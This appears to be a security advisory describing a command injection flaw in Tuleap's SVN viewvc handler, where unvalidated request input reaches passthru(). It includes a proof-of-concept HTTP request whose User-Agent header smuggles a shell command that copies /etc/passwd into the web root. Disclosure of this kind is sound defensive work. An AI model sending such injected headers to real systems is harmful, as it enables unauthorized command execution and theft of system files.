Tuleap does not validate the syntax of the request sent to SVN handler pages to validate request passed to passthru() is introducing any extra parameters that would be executed in the content of the application.

This vulnerability can be exploited by external attackers to introduce external commands into its workflow that would execute them as shown on the attached Proof Of Concept code below.

Impact

Complete loss of confidentiality and integrity of the affected system.

Exploit

After registering with the application and sending a request similar to the one below the vulnerability can be triggered:

GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
Host: [IP]
User-Agent: M" && cat /etc/passwd >
/usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[IP]/svn/?group_id=102
Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95;
TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
Connection: keep-alive
Cache-Control: max-age=0

Note: Any user with privilege to view svn directories will be in position to exploit this issue. This usually implies that any user (even lowest level) on the system can get access to the svn repository to browse it and since users can register themselves this issue allows for direct exploitation.